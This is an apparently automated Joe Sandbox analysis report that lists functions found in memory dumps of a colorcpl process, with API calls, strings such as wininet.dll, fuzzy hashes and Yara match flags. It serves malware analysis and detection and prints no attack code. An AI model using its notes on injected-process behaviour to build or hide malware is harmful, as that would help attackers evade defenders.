Opcode Fuzzy Hash: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
Instruction Fuzzy Hash: 7F90023220180402F100759954086560005CBE0305F55E051A5025656EC769D9927131

Function 04BD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2C7A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
Instruction ID: bace431588dedca7a6790826963360f40ca83c11edf2a528eb5121b3e80cf149
Opcode Fuzzy Hash: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
Instruction Fuzzy Hash: 9890023220188802F1107159840475A0005CBD0305F59D451A4425759D8799D9927121

Function 04BD2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2C6A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
Instruction ID: c621560d602fda867b196f7b89b2bc1470dd1a21ccce025b349f846b65745b2c
Opcode Fuzzy Hash: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
Instruction Fuzzy Hash: E190023220180842F10071594404B560005CBE0305F55D056A0125755D8719D9527521

Function 04BD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2DFA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
Instruction ID: 155cadcdb3e84791afcc0b144f45141414e9f13a245d3f65683a7f7c7edb5cec
Opcode Fuzzy Hash: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
Instruction Fuzzy Hash: 9390023220180413F111715945047170009CBD0245F95D452A0425659D975ADA53B121

Function 04BD2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2DDA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
Instruction ID: bffd333265f89fdb715c466db1f882ac24ef318a6a3da0b019deb01f7c887a52
Opcode Fuzzy Hash: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
Instruction Fuzzy Hash: 9D900222242841527545B15944045174006DBE0245795D052A1415A51C862AE957E621

Function 04BD2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2D3A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8823f1da6b08b31f4457bf2a0ae766debfea65c69c5f34f5bbfebbef0f0390b5
Instruction ID: 15b2413704fffccd7bf76cb64f4cc561871ece6337acd51c5ae9c324adced07b
Opcode Fuzzy Hash: 8823f1da6b08b31f4457bf2a0ae766debfea65c69c5f34f5bbfebbef0f0390b5
Instruction Fuzzy Hash: 0390022230180003F140715954186164005DBE1305F55E051E0415655CDA19D9576222

Function 04BD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2D1A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
Instruction ID: 166748229a3b8c12b60bea6b13829603b868b7bb9d55510ac29d1965f4b904d0
Opcode Fuzzy Hash: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
Instruction Fuzzy Hash: AC90022A21380002F1807159540861A0005CBD1206F95E455A0016659CCA19D96A6321

Function 04BD2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2E8A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45dc910cfb0852453f763ddcb75c7cacb7836ee8fe760b5a83937a315a2bac67
Instruction ID: a17817b54830f03cc333cc4fb3b443d055ff4ec6560e39e8dc8ac107d0f83f90
Opcode Fuzzy Hash: 45dc910cfb0852453f763ddcb75c7cacb7836ee8fe760b5a83937a315a2bac67
Instruction Fuzzy Hash: 1190022260180502F10171594404626000ACBD0245F95D062A1025656ECB29DA93B131

Function 04BD2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2EEA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc41fd5f0ab0ce7bfebf4d4886325ea56bc2cc0b4755561261fd6955772779cc
Instruction ID: ca9b46b4f4686e4184466a69b9d9a7b81cb33c0ded2bc6df219406d8a1978d0c
Opcode Fuzzy Hash: dc41fd5f0ab0ce7bfebf4d4886325ea56bc2cc0b4755561261fd6955772779cc
Instruction Fuzzy Hash: DF900262201C0403F140755948046170005CBD0306F55D051A2065656E8B2DDD527135

Function 04BD2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2FBA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57a8dbd390d9cb61f5537ae57ead153a29d920863ffba7866fa9aed3ea1fbd92
Instruction ID: 323eca1f097ef7b4c2b0c7d680f876627fdb873e233031c6e5b680a764fc5a0c
Opcode Fuzzy Hash: 57a8dbd390d9cb61f5537ae57ead153a29d920863ffba7866fa9aed3ea1fbd92
Instruction Fuzzy Hash: 1F900222601800426140716988449164005EFE1215755D161A0999651D865DD9666665

Function 04BD2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2FEA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
Instruction ID: b549f27219203a72adb52f0d67a63b1fed48af6ed52807bb8fa2cd91582fb9f6
Opcode Fuzzy Hash: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
Instruction Fuzzy Hash: B6900222211C0042F20075694C14B170005CBD0307F55D155A0155655CCA19D9626521

Function 04BD2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2F3A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
Instruction ID: 1a047a3daa8a1b54f750421a55bf7cd403f569607573c549cce85c26b53e07ac
Opcode Fuzzy Hash: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
Instruction Fuzzy Hash: 7590026234180442F10071594414B160005CBE1305F55D055E1065655D871DDD537126

Function 04BD2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2AFA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 531c4afc94543db0b73d63803d28fc0fae3841aadbfb94614b9f7c82fd21039e
Instruction ID: 157562f83d0b05ddcc3f029b519e371737a272f57b988a6949807134919406f7
Opcode Fuzzy Hash: 531c4afc94543db0b73d63803d28fc0fae3841aadbfb94614b9f7c82fd21039e
Instruction Fuzzy Hash: 1F900226221800022145B559060451B0445DBD6355395D055F1417691CC725D9666321

Function 04BD2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2ADA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
Instruction ID: f143598ae6e0d91e5bbe7e8ea79f2193450d5c637d67b452eb7f8c01345b9f8c
Opcode Fuzzy Hash: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
Instruction Fuzzy Hash: 09900226211800032105B55907045170046CBD5355355D061F1016651CD725D9626121

Function 04BD2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2BAA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2786a4359fcfa1591033ed6b903532bcf9fc48000524053acc62e0645bbcb786
Instruction ID: 29381ea9cff283bbb972268ea06c775645f7a33552fdf8f5896fbfd5c33012be
Opcode Fuzzy Hash: 2786a4359fcfa1591033ed6b903532bcf9fc48000524053acc62e0645bbcb786
Instruction Fuzzy Hash: C690023260580802F150715944147560005CBD0305F55D051A0025755D8759DB5676A1

Function 04BD2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2BFA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
Instruction ID: bf2833956bff9d013a3cee391551769fbcc8c516693fc321fa74e51c83c072ce
Opcode Fuzzy Hash: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
Instruction Fuzzy Hash: 6B90023220180802F1807159440465A0005CBD1305F95D055A0026755DCB19DB5A77A1

Function 04BD2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2BEA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
Instruction ID: 170cb2e7530c5551192da86db247e2b0f2d258f55fed4a628ed139aec81cbf62
Opcode Fuzzy Hash: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
Instruction Fuzzy Hash: 1090023220584842F14071594404A560015CBD0309F55D051A0065795D9729DE56B661

Function 04BD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2B6A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
Instruction ID: 16ef8481e581543ef4db02415191411f2fc8254ee9c03b2254c2171b048063d7
Opcode Fuzzy Hash: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
Instruction Fuzzy Hash: 9E90026220280003610571594414626400ACBE0205B55D061E1015691DC629D9927125

Function 04BD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD35CA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
Instruction ID: 5d149983497a77deace508264920a5dbdc61d1331ca5d171ed68536f4b847a4d
Opcode Fuzzy Hash: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
Instruction Fuzzy Hash: C290023260590402F100715945147161005CBD0205F65D451A0425669D8799DA5275A2

Function 04BD39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD39BA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bfa7aec17b808e9b65fedfd34e65f30ba5038a21e089c8fff30d0c6f0e9eb37
Instruction ID: 74c0ccb108119805bb23428de729a5b4d3250e4e59a19c2d60e05ceb465064a6
Opcode Fuzzy Hash: 9bfa7aec17b808e9b65fedfd34e65f30ba5038a21e089c8fff30d0c6f0e9eb37
Instruction Fuzzy Hash: 4190022224585102F150715D44046264005EBE0205F55D061A0815695D8659D9567221

Function 029D3A60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 029D3B3B

Strings

net.dll, xrefs: 029D3AF7, 029D3B86, 029D3B66, 029D3B72, 029D3B92
wininet.dll, xrefs: 029D3ACE, 029D3ADA

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a310c2a508d6863f08924fc1d63512a9668d20fed26e26eb8e74229505de8165
Instruction ID: a16e0c32b6de461061a3cbcae777fa203ad4254cf690fc81d1625fd8ce60dd38
Opcode Fuzzy Hash: a310c2a508d6863f08924fc1d63512a9668d20fed26e26eb8e74229505de8165
Instruction Fuzzy Hash: FA319DB1A00205BBD714DFA4CC80FEBBBB9EF88300F14855DE519AB240D774AA00CBA5

Function 029CF4D9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 029CF4F7
CoUninitialize.COMBASE ref: 029CF5DE

Strings

@J7<, xrefs: 029CF50B

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 06498370707a36ed01d85b0f3462a92d1ca7579dedd6f1ab5b0d05795d611441
Instruction ID: ca00db563128451d56adb46c5280691a3271318fb10d8b174215dafb718e2b64
Opcode Fuzzy Hash: 06498370707a36ed01d85b0f3462a92d1ca7579dedd6f1ab5b0d05795d611441
Instruction Fuzzy Hash: B43121B5A0060A9FDB10DFD8C8809EEB7BABF88304F108559E915E7214D775EE458BA1

Function 029CF4E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 029CF4F7
CoUninitialize.COMBASE ref: 029CF5DE

Strings

@J7<, xrefs: 029CF50B

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: df9188344f3fda17909b3548ed9b45dd9adf76c4d58bbcbca05122199f0d731f
Instruction ID: 4db065501976f1a4278954bc91a62a4c7750dbc897ee130e049a3a8c9cb98519
Opcode Fuzzy Hash: df9188344f3fda17909b3548ed9b45dd9adf76c4d58bbcbca05122199f0d731f
Instruction Fuzzy Hash: 923132B5A0060A9FDB10DFD8C8809EFB7BAFF88304F108559E515E7214D775EE058BA1

Function 029C44F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 029C4562

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a1becba5c8c8cabc2e01c087e7877055152ed7ce1b87e3564bd628a7dfcc5aab
Instruction ID: 573f2ea628d1a99baaa09b758ed593101a94431e2546ec94be4537c9d5c52bc4
Opcode Fuzzy Hash: a1becba5c8c8cabc2e01c087e7877055152ed7ce1b87e3564bd628a7dfcc5aab
Instruction Fuzzy Hash: 14011EB9E0020DBBDB10DAA4DC41F9DB3B99B54308F108595A90897280F631E758DB91

Function 029D98C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,029C82CE,00000010,?,?,?,00000044,?,00000010,029C82CE,?,?,?), ref: 029D9920

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 499a315fd9cb8297bb1461eefacef7f4e0ee28131f4312401ad39fe70fbe6b69
Instruction ID: f48d49154b34c62c4f6ae0f07d379ca4c2a75ece9e164b0312a4d43ce10cc205
Opcode Fuzzy Hash: 499a315fd9cb8297bb1461eefacef7f4e0ee28131f4312401ad39fe70fbe6b69
Instruction Fuzzy Hash: D60180B2214508BBDB44DE99DC91EDB77AEAF8C754F518208FA0DE3240D630F8518BA4

Function 029C44E3 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 029C4562

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3acfdc2849712096af051a8a49181b961f7679f1307d7bba36cc4d008d990878
Instruction ID: 3d4c9e40e2ea48e61502a4e8933d5f820afba0844f7341a4a673333cc4efd0a2
Opcode Fuzzy Hash: 3acfdc2849712096af051a8a49181b961f7679f1307d7bba36cc4d008d990878
Instruction Fuzzy Hash: B2F03C75E4020EABDF11DA94D842FEDB368EB44308F1082A9E9089B681E671D609CBD2

Function 029B9FC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029BA005

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
